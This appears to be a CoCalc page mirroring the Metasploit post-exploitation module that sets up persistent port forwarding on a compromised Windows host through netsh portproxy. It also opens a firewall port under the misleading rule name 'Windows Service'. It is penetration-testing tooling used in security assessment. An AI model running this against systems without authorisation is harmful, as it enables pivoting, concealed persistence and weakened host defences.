CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/manage/portproxy.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::Windows::Priv

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Windows Manage Set Port Forwarding With PortProxy',

14
        'Description' => %q{

15
          This module uses the PortProxy interface from netsh to set up

16
          port forwarding persistently (even after reboot). PortProxy

17
          supports TCP IPv4 and IPv6 connections.

18
        },

19
        'License' => MSF_LICENSE,

20
        'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],

21
        'Platform' => 'win',

22
        'SessionTypes' => [ 'meterpreter' ]

23
      )

24
    )

25


26
    register_options(

27
      [

28
        OptAddress.new('LOCAL_ADDRESS', [ true, 'IPv4/IPv6 address to which to listen.']),

29
        OptAddress.new('CONNECT_ADDRESS', [ true, 'IPv4/IPv6 address to which to connect.']),

30
        OptPort.new('CONNECT_PORT', [ true, 'Port number to which to connect.']),

31
        OptPort.new('LOCAL_PORT', [ true, 'Port number to which to listen.']),

32
        OptBool.new('IPV6_XP', [ true, 'Install IPv6 on Windows XP (needed for v4tov4).', true]),

33
        OptEnum.new('TYPE', [ true, 'Type of forwarding', 'v4tov4', ['v4tov4', 'v6tov6', 'v6tov4', 'v4tov6']])

34
      ]

35
    )

36
  end

37


38
  def run

39
    if !is_admin?

40
      print_error("You don't have enough privileges. Try getsystem.")

41
      return

42
    end

43


44
    # Due to a bug in Windows XP you need to install IPv6

45
    # http://support.microsoft.com/kb/555744/en-us

46
    version = get_version_info

47
    if version.build_number.between?(Msf::WindowsVersion::XP_SP0, Msf::WindowsVersion::XP_SP2) && !check_ipv6

48
      return

49
    end

50


51
    return unless enable_portproxy

52


53
    fw_enable_ports

54
  end

55


56
  def enable_portproxy

57
    rtable = Rex::Text::Table.new(

58
      'Header' => 'Port Forwarding Table',

59
      'Indent' => 3,

60
      'Columns' => ['LOCAL IP', 'LOCAL PORT', 'REMOTE IP', 'REMOTE PORT']

61
    )

62


63
    print_status('Setting PortProxy ...')

64
    netsh_args = 'interface portproxy '

65
    netsh_args << "add #{datastore['TYPE']} "

66
    netsh_args << "listenport=#{datastore['LOCAL_PORT']} "

67
    netsh_args << "listenaddress=#{datastore['LOCAL_ADDRESS']} "

68
    netsh_args << "connectport=#{datastore['CONNECT_PORT']} "

69
    netsh_args << "connectaddress=#{datastore['CONNECT_ADDRESS']}"

70
    output = cmd_exec('netsh', netsh_args)

71
    if output.size > 2

72
      print_error('Setup error. Verify parameters and syntax.')

73
      return false

74
    else

75
      print_good('PortProxy added.')

76
    end

77


78
    output = cmd_exec('netsh', 'interface portproxy show all')

79
    output.each_line do |l|

80
      rtable << l.split(' ') if l.strip =~ /^[0-9]|\*/

81
    end

82
    print_status(rtable.to_s)

83
    return true

84
  end

85


86
  def ipv6_installed

87
    output = cmd_exec('netsh', 'interface ipv6 show interface')

88
    if output.lines.count > 2

89
      return true

90
    else

91
      return false

92
    end

93
  end

94


95
  def check_ipv6

96
    if ipv6_installed

97
      print_status('IPv6 is already installed.')

98
      return true

99
    elsif !datastore['IPV6_XP']

100
      print_error('IPv6 is not installed. You need IPv6 to use portproxy.')

101
      print_status('IPv6 can be installed with "netsh interface ipv6 install"')

102
      return false

103
    else

104
      print_status('Installing IPv6... can take a little long')

105
      cmd_exec('netsh', 'interface ipv6 install', 120)

106
      if !ipv6_installed

107
        print_error('IPv6 was not successfully installed. Run it again.')

108
        return false

109
      end

110
      print_good('IPv6 was successfully installed.')

111
      return true

112
    end

113
  end

114


115
  def fw_enable_ports

116
    print_status("Setting port #{datastore['LOCAL_PORT']} in Windows Firewall ...")

117
    version = get_version_info

118
    if version.build_number >= Msf::WindowsVersion::Vista_SP0

119
      cmd_exec('netsh', "advfirewall firewall add rule name=\"Windows Service\" dir=in protocol=TCP action=allow localport=\"#{datastore['LOCAL_PORT']}\"")

120
    else

121
      cmd_exec('netsh', "firewall set portopening protocol=TCP port=\"#{datastore['LOCAL_PORT']}\"")

122
    end

123
    output = cmd_exec('netsh', 'firewall show state')

124


125
    if output =~ /^#{datastore['LOCAL_PORT']} /

126
      print_good('Port opened in Windows Firewall.')

127
    else

128
      print_error('There was an error enabling the port.')

129
    end

130
  end

131
end

132


133